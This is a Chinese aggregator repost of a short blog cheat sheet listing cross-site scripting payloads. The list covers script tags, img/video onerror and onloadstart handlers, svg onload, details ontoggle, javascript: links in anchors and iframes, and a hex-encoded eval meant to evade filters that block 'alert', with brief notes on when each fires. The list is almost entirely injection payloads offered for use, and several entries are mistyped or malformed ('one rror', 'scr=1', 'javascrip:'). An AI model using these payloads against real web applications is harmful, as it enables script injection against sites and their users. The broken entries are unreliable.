ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

xss payload

2019-09-11 09:53:58  阅读:236  来源: 互联网

标签:xss onerror 路径 alert payload 弹窗 图片


<script>alert(xss)</script>


<img scr=1 one rror=alert('xss')>当找不到图片名为1的文件时,执行alert('xss')
<a href=javascrip:alert("xss")>s</a> 点击s时运行alert('xss')
<iframe src=javascript:alert('xss');height=0 width=0 /><iframe>利用iframe的scr来弹窗
<img src="1" one rror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>过滤了alert来执行弹窗
onclick='alert(/fuck/)

 


<IMG?SRC="javascript:alert('XSS');">

 

<img src="" "Alert(/test/)">

<img src=x one rror=alert(xss)>

<img src=1 one rror=alert(1)>
是当图片没有找到路径(即src=“路径:可以使相对路径也可以使绝对路径”找不到图片)就会 弹出消息框,显示 1 ,就是onerror=alert(1)起的作用
<img src=1 one rror=alert(1)>


<details/open/ontoggle=alert(1)>

<svg/onload=alert(1)>

<img/src/onerror=alert(1)>

<video/src/onerror=alert(1)>

<script>(alert)(1)</script>

<video><sourceonerror="javascript:alert(1)">

<video/src/onloadstart="alert(1)">

<ahref=javascript:alert(1)>222</a>

标签:xss,onerror,路径,alert,payload,弹窗,图片
来源: https://www.cnblogs.com/yjxing/p/11504491.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有